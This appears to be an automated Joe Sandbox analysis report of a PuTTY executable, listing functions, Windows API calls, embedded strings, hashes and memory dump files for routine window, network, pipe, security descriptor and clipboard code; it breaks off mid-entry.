Opcode Fuzzy Hash: 570241226dc569d8556a6d44eafd03aa757bfd8765273278d836e16b3d774ded
Instruction Fuzzy Hash: 02D18F66A1CA868AFB248B2CAE5537E6690FF4D744F640035DB4EC3AB5CE7CE440CB41

Function 00007FF6BB2A3700 Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 256windowCOMMON

Download Yara Rule

APIs

SetWindowTextA.USER32 ref: 00007FF6BB2A3750
SendDlgItemMessageA.USER32 ref: 00007FF6BB2A377E
SendDlgItemMessageA.USER32 ref: 00007FF6BB2A37B9
SendDlgItemMessageA.USER32 ref: 00007FF6BB2A3834
GetParent.USER32 ref: 00007FF6BB2A385B
SetActiveWindow.USER32 ref: 00007FF6BB2A3864
DestroyWindow.USER32 ref: 00007FF6BB2A386D
SendDlgItemMessageA.USER32 ref: 00007FF6BB2A38C8
SendDlgItemMessageA.USER32 ref: 00007FF6BB2A390A
MessageBeep.USER32 ref: 00007FF6BB2A3983
SendDlgItemMessageA.USER32 ref: 00007FF6BB2A3AC9

Strings

%s Event Log, xrefs: 00007FF6BB2A373B

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Message$ItemSend$Window$ActiveBeepDestroyParentText
String ID: %s Event Log
API String ID: 1719468517-583241876
Opcode ID: 6eadc0005c9ffe8ed3c473d3c66070ea8b75e77aadd5869c7ca412fb6a468747
Instruction ID: 7e2984a3459b959f485659333d65502b6f2bcbd6c83e54a3d420b55ab922411b
Opcode Fuzzy Hash: 6eadc0005c9ffe8ed3c473d3c66070ea8b75e77aadd5869c7ca412fb6a468747
Instruction Fuzzy Hash: E1A1AC32B186028AFB649B1DEA947BA6291FB4CB84F541535DA4EC3BF5DE3DE1018F00

Function 00007FF6BB2BF260 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 188networkCOMMON

Download Yara Rule

APIs

htonl.WS2_32 ref: 00007FF6BB2BF354
htonl.WS2_32 ref: 00007FF6BB2BF35E
socket.WS2_32 ref: 00007FF6BB2BF38E
SetHandleInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00007FF6BB2DC384), ref: 00007FF6BB2BF3A2
WSAIoctl.WS2_32 ref: 00007FF6BB2BF3ED
htonl.WS2_32 ref: 00007FF6BB2BF458
socket.WS2_32 ref: 00007FF6BB2BF48C
SetHandleInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00007FF6BB2DC384), ref: 00007FF6BB2BF4A0
WSAIoctl.WS2_32 ref: 00007FF6BB2BF4EB

Strings

addr->addresses && step.curraddr < addr->naddresses, xrefs: 00007FF6BB2BF335
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/network.c, xrefs: 00007FF6BB2BF2F9, 00007FF6BB2BF33C
family == AF_UNSPEC, xrefs: 00007FF6BB2BF2F2

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: htonl$HandleInformationIoctlsocket
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/network.c$addr->addresses && step.curraddr < addr->naddresses$family == AF_UNSPEC
API String ID: 156137457-251196645
Opcode ID: 8971d0b1c7270a30c2299cc67f2fcacbd3c90aabaff784f71aa1d9edac9d5cce
Instruction ID: 0df84758abacd14d927b1aa8598343c22d47f14b6d44712d18fc90f71b3edadd
Opcode Fuzzy Hash: 8971d0b1c7270a30c2299cc67f2fcacbd3c90aabaff784f71aa1d9edac9d5cce
Instruction Fuzzy Hash: D5819222A18A5282FB608B2CD59477962A1FB8DB54F245136DB5EC3BF4DF3CE8458B00

Function 00007FF6BB2C7130 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6BB2C7350: AllocateAndInitializeSid.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,-00000008,?,00007FF6BB2C7538), ref: 00007FF6BB2C740D
Part of subcall function 00007FF6BB2C7350: AllocateAndInitializeSid.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,-00000008,?,00007FF6BB2C7538), ref: 00007FF6BB2C747B
Part of subcall function 00007FF6BB2C7350: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,-00000008,?,00007FF6BB2C7538), ref: 00007FF6BB2C7485

LocalAlloc.KERNEL32 ref: 00007FF6BB2C725D
InitializeSecurityDescriptor.ADVAPI32 ref: 00007FF6BB2C7273
SetSecurityDescriptorOwner.ADVAPI32 ref: 00007FF6BB2C728A
SetSecurityDescriptorDacl.ADVAPI32 ref: 00007FF6BB2C72A2
GetLastError.KERNEL32 ref: 00007FF6BB2C72E2
LocalFree.KERNEL32 ref: 00007FF6BB2C7305
LocalFree.KERNEL32 ref: 00007FF6BB2C731A

Strings

unable to set DACL in security descriptor: %s, xrefs: 00007FF6BB2C72DB
unable to set owner in security descriptor: %s, xrefs: 00007FF6BB2C72D2
unable to initialise security descriptor: %s, xrefs: 00007FF6BB2C72C9
unable to construct ACL: %s, xrefs: 00007FF6BB2C723A
unable to allocate security descriptor: %s, xrefs: 00007FF6BB2C72C0

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: DescriptorInitializeLocalSecurity$AllocateErrorFreeLast$AllocDaclOwner
String ID: unable to allocate security descriptor: %s$unable to construct ACL: %s$unable to initialise security descriptor: %s$unable to set DACL in security descriptor: %s$unable to set owner in security descriptor: %s
API String ID: 436594416-3066058096
Opcode ID: d06c1e6c915d6b0c1d8c19af5bbfd37ba5b97767618dbb2da938d1d845b5b241
Instruction ID: e9c85b0d93cd298ce8064f56a33041bae655efc102df74279691a73e9f440a01
Opcode Fuzzy Hash: d06c1e6c915d6b0c1d8c19af5bbfd37ba5b97767618dbb2da938d1d845b5b241
Instruction Fuzzy Hash: 70511532A09A8281FB618F1DE9557BA73A0BF88754F104135EB8D83674EF7EE185CB41

Function 00007FF6BB2BDA70 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 167libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6BB2C6460: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000,?,00007FF6BB38EAB3,00000000), ref: 00007FF6BB2C652D
Part of subcall function 00007FF6BB2C6460: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000,?,00007FF6BB38EAB3,00000000), ref: 00007FF6BB2C6576

GetProcAddress.KERNEL32 ref: 00007FF6BB2BDB33

Part of subcall function 00007FF6BB2BE210: CreateFileA.KERNEL32(?,?,?,?,?,?,?,00000000,00007FF6BB2BDCDB), ref: 00007FF6BB2BE25D

GetEnvironmentVariableA.KERNEL32 ref: 00007FF6BB2BDC25
GetEnvironmentVariableA.KERNEL32 ref: 00007FF6BB2BDC3B
GetWindowsDirectoryA.KERNEL32 ref: 00007FF6BB2BDCA5

Part of subcall function 00007FF6BB2C6750: RegQueryValueExA.ADVAPI32(?,?,?,?,?,00000001,00000000,00007FF6BB2BDAC6), ref: 00007FF6BB2C678D
Part of subcall function 00007FF6BB2C6750: RegQueryValueExA.ADVAPI32 ref: 00007FF6BB2C67D4

Strings

shell32.dll, xrefs: 00007FF6BB2BDB11
HOMEDRIVE, xrefs: 00007FF6BB2BDC09
SHGetFolderPathA, xrefs: 00007FF6BB2BDB29
HOMEPATH, xrefs: 00007FF6BB2BDC29
\PUTTY.RND, xrefs: 00007FF6BB2BDB77, 00007FF6BB2BDBCE, 00007FF6BB2BDC5C, 00007FF6BB2BDCB2
Software\SimonTatham\PuTTY, xrefs: 00007FF6BB2BDA98
RandSeedFile, xrefs: 00007FF6BB2BDAB7

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: CreateEnvironmentQueryValueVariable$AddressCloseDirectoryFileProcWindows
String ID: HOMEDRIVE$HOMEPATH$RandSeedFile$SHGetFolderPathA$Software\SimonTatham\PuTTY$\PUTTY.RND$shell32.dll
API String ID: 901926110-1528239033
Opcode ID: 4c623e055b3eb6992433eb0ff6b0b8a513d3b55d1e08a53965888bb7b02e97e5
Instruction ID: ccf575d52b99f1d730888472f0693fc007cb32fc0e2823a2c73549b246320c93
Opcode Fuzzy Hash: 4c623e055b3eb6992433eb0ff6b0b8a513d3b55d1e08a53965888bb7b02e97e5
Instruction Fuzzy Hash: F8616D21B0CA9241FA74A72DA5507FA2390BF8C794F540631DF8EC7BAAEE7CE5458700

Function 00007FF6BB28D2D0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 150fileCOMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32 ref: 00007FF6BB28D337
GetCurrentProcessId.KERNEL32 ref: 00007FF6BB28D341
CreateFileA.KERNEL32 ref: 00007FF6BB28D390
GetLastError.KERNEL32 ref: 00007FF6BB28D450
CreateFileA.KERNEL32 ref: 00007FF6BB28D4A9
WriteFile.KERNEL32 ref: 00007FF6BB28D509
DeleteFileA.KERNEL32 ref: 00007FF6BB28D517
CloseHandle.KERNEL32 ref: 00007FF6BB28D544

Strings

%s::/%s.html>main, xrefs: 00007FF6BB28D3C3
%s\putty_%lu_%llu.chm, xrefs: 00007FF6BB28D349, 00007FF6BB28D467

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: File$Create$CloseCurrentDeleteErrorHandleLastPathProcessTempWrite
String ID: %s::/%s.html>main$%s\putty_%lu_%llu.chm
API String ID: 4085685679-1808412575
Opcode ID: d976e458e8c62dd64c10ecddeec44299d36c0de5727f10c3b9b683b6b2cc316c
Instruction ID: e4eb37d7b0d7bd0f72ac028a59e6725de144fa902fc0100fe13af77997042a92
Opcode Fuzzy Hash: d976e458e8c62dd64c10ecddeec44299d36c0de5727f10c3b9b683b6b2cc316c
Instruction Fuzzy Hash: E951D121B0860285FA10AB19B91477A77A0BF4DBE8F641238DF5D877E4CF7DE4498B00

Function 00007FF6BB287D50 Relevance: 16.7, APIs: 11, Instructions: 183COMMON

Download Yara Rule

APIs

CreatePen.GDI32 ref: 00007FF6BB287E4E
SelectObject.GDI32 ref: 00007FF6BB287E65
MoveToEx.GDI32 ref: 00007FF6BB287E79
LineTo.GDI32 ref: 00007FF6BB287E9A
SelectObject.GDI32 ref: 00007FF6BB287EAA
CreatePen.GDI32 ref: 00007FF6BB287F29
SelectObject.GDI32 ref: 00007FF6BB287F40
Polyline.GDI32 ref: 00007FF6BB287F57
SelectObject.GDI32 ref: 00007FF6BB287F67
DeleteObject.GDI32 ref: 00007FF6BB287F6C
SetPixel.GDI32 ref: 00007FF6BB287FF6

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Object$Select$Create$DeleteLineMovePixelPolyline
String ID:
API String ID: 1020918164-0
Opcode ID: 450bcdd224cc7f4c6583d93fecdf1e34ce695ac6226fb09f393737156ed8a644
Instruction ID: f0b2f707fda9cbfec00632cf1cfb1195eaaa0d2ce8da271367c7602831221e3e
Opcode Fuzzy Hash: 450bcdd224cc7f4c6583d93fecdf1e34ce695ac6226fb09f393737156ed8a644
Instruction Fuzzy Hash: B7716D32E0864286EB508B1AED40379B7A4BF98B90F594036DF1DC7BB4DE7DE4818B00

Function 00007FF6BB2893C0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 150COMMON

Download Yara Rule

APIs

IsZoomed.USER32 ref: 00007FF6BB289405
GetMonitorInfoA.USER32 ref: 00007FF6BB2894AC
GetDesktopWindow.USER32 ref: 00007FF6BB2894BE
GetClientRect.USER32 ref: 00007FF6BB2894CC
IsZoomed.USER32 ref: 00007FF6BB289555
SetWindowPos.USER32 ref: 00007FF6BB2895C9
InvalidateRect.USER32 ref: 00007FF6BB2895EA

Strings

(, xrefs: 00007FF6BB28949C

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: RectWindowZoomed$ClientDesktopInfoInvalidateMonitor
String ID: (
API String ID: 3999421749-3887548279
Opcode ID: 1b39b3fc7e1ae6cac7879bbfec5b4b0ded8e1ce4cfaa27b8c048b225fdcf67fe
Instruction ID: 3b0183d5a57c00085d14290ee8cc2c70fd2a17ca2800a4009ec23e4eb4b80bd7
Opcode Fuzzy Hash: 1b39b3fc7e1ae6cac7879bbfec5b4b0ded8e1ce4cfaa27b8c048b225fdcf67fe
Instruction Fuzzy Hash: 03514A21A0C60286FB149B2DEA5637A67A0BF8C750F645035DB4ED26B1DE7CE4858B00

Function 00007FF6BB32B500 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 113pipeCOMMON

Download Yara Rule

APIs

CreateNamedPipeA.KERNEL32 ref: 00007FF6BB32B654
CreateEventA.KERNEL32 ref: 00007FF6BB32B679

Part of subcall function 00007FF6BB34B8AC: _set_error_mode.LIBCMT ref: 00007FF6BB34B8D3

GetLastError.KERNEL32 ref: 00007FF6BB32B6A5

Part of subcall function 00007FF6BB2C7AD0: FormatMessageA.KERNEL32(?,?,?,?,?,?,?,00000000,00007FF6BB2BDCDB), ref: 00007FF6BB2C7B7B

Strings

\\.\pipe\, xrefs: 00007FF6BB32B574
unable to create named pipe '%s': %s, xrefs: 00007FF6BB32B6B2
strncmp(pipename, "\\\\.\\pipe\\", 9) == 0, xrefs: 00007FF6BB32B58D
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/named-pipe-server.c, xrefs: 00007FF6BB32B594, 00007FF6BB32B5C8
strchr(pipename + 9, '\\') == NULL, xrefs: 00007FF6BB32B5C1

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Create$ErrorEventFormatLastMessageNamedPipe_set_error_mode
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/named-pipe-server.c$\\.\pipe\$strchr(pipename + 9, '\\') == NULL$strncmp(pipename, "\\\\.\\pipe\\", 9) == 0$unable to create named pipe '%s': %s
API String ID: 3886136549-387693737
Opcode ID: b87d8209786a7a4a141eb306854abe345b77ed89bf5bcefb34fe3e8443394ead
Instruction ID: 1093ba029eb701df6fedbfa5b5b7bbbcdb9fbf5ab6803f1c99fab11e57905ec0
Opcode Fuzzy Hash: b87d8209786a7a4a141eb306854abe345b77ed89bf5bcefb34fe3e8443394ead
Instruction Fuzzy Hash: 5F519031A08B4292FB109B19E9503BA33A0FF8D794F504239DB8D87BA1EF7DE1658740

Function 00007FF6BB2C7350 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 84memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,-00000008,?,00007FF6BB2C7538), ref: 00007FF6BB2C740D
AllocateAndInitializeSid.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,-00000008,?,00007FF6BB2C7538), ref: 00007FF6BB2C747B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,-00000008,?,00007FF6BB2C7538), ref: 00007FF6BB2C7485

Part of subcall function 00007FF6BB2C6F90: GetCurrentProcessId.KERNEL32 ref: 00007FF6BB2C6FD0
Part of subcall function 00007FF6BB2C6F90: OpenProcess.KERNEL32 ref: 00007FF6BB2C6FE2
Part of subcall function 00007FF6BB2C6F90: GetLastError.KERNEL32 ref: 00007FF6BB2C7033
Part of subcall function 00007FF6BB2C6F90: LocalAlloc.KERNEL32 ref: 00007FF6BB2C7058
Part of subcall function 00007FF6BB2C6F90: GetLengthSid.ADVAPI32 ref: 00007FF6BB2C708A
Part of subcall function 00007FF6BB2C6F90: CopySid.ADVAPI32 ref: 00007FF6BB2C70AE
Part of subcall function 00007FF6BB2C6F90: CloseHandle.KERNEL32 ref: 00007FF6BB2C70D4
Part of subcall function 00007FF6BB2C6F90: CloseHandle.KERNEL32 ref: 00007FF6BB2C70E4
Part of subcall function 00007FF6BB2C6F90: LocalFree.KERNEL32 ref: 00007FF6BB2C70F2

GetLastError.KERNEL32 ref: 00007FF6BB2C749B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,-00000008,?,00007FF6BB2C7538), ref: 00007FF6BB2C74B1

Part of subcall function 00007FF6BB2C7AD0: FormatMessageA.KERNEL32(?,?,?,?,?,?,?,00000000,00007FF6BB2BDCDB), ref: 00007FF6BB2C7B7B

Strings

unable to construct SID for local same-user access only: %s, xrefs: 00007FF6BB2C7492
unable to construct SID for world: %s, xrefs: 00007FF6BB2C74BE
unable to construct SID for current user: %s, xrefs: 00007FF6BB2C74A8

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: ErrorLast$AllocateCloseHandleInitializeLocalProcess$AllocCopyCurrentFormatFreeLengthMessageOpen
String ID: unable to construct SID for current user: %s$unable to construct SID for local same-user access only: %s$unable to construct SID for world: %s
API String ID: 742050092-2222155745
Opcode ID: 9d36614716a936bb1a79ce33bfafbb3c3ae2181377b693410ed1cafb5f25415f
Instruction ID: 544ecfebc381b99f0e6e4b41306fff61744daff3b857e4d5dde9386d7a7f1df5
Opcode Fuzzy Hash: 9d36614716a936bb1a79ce33bfafbb3c3ae2181377b693410ed1cafb5f25415f
Instruction Fuzzy Hash: C841F831A18A4286FB209F29E85477A77A0FB98344F600135EB8EC6BB4DF7DE444CB51

Function 00007FF6BB2C6F90 Relevance: 13.6, APIs: 9, Instructions: 111memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF6BB2C6FD0
OpenProcess.KERNEL32 ref: 00007FF6BB2C6FE2
GetLastError.KERNEL32 ref: 00007FF6BB2C7033
LocalAlloc.KERNEL32 ref: 00007FF6BB2C7058
GetLengthSid.ADVAPI32 ref: 00007FF6BB2C708A
CopySid.ADVAPI32 ref: 00007FF6BB2C70AE
CloseHandle.KERNEL32 ref: 00007FF6BB2C70D4
CloseHandle.KERNEL32 ref: 00007FF6BB2C70E4
LocalFree.KERNEL32 ref: 00007FF6BB2C70F2

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: CloseHandleLocalProcess$AllocCopyCurrentErrorFreeLastLengthOpen
String ID:
API String ID: 621491157-0
Opcode ID: 24f2ec660f1a7adf57d626a05d6b58fd5711ab4ac1cec2a1069b774d290b779f
Instruction ID: 73093aef8a976e5f8f601828a7fb75f75f3ac52afd63ac6c562eaf6789674200
Opcode Fuzzy Hash: 24f2ec660f1a7adf57d626a05d6b58fd5711ab4ac1cec2a1069b774d290b779f
Instruction Fuzzy Hash: 4D418021B0964246FE919F6AA554B7A6391BF8CB80F255034DF0ED7BB4DF3CE4458B00

Function 00007FF6BB287060 Relevance: 13.6, APIs: 9, Instructions: 71clipboardmemorywindowCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32 ref: 00007FF6BB287087
GlobalLock.KERNEL32 ref: 00007FF6BB28709C
GlobalUnlock.KERNEL32 ref: 00007FF6BB2870C3
SendMessageA.USER32 ref: 00007FF6BB2870E3
OpenClipboard.USER32 ref: 00007FF6BB2870F0
EmptyClipboard.USER32 ref: 00007FF6BB2870FA
SetClipboardData.USER32 ref: 00007FF6BB287108
CloseClipboard.USER32 ref: 00007FF6BB28710E
GlobalFree.KERNEL32 ref: 00007FF6BB287127

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

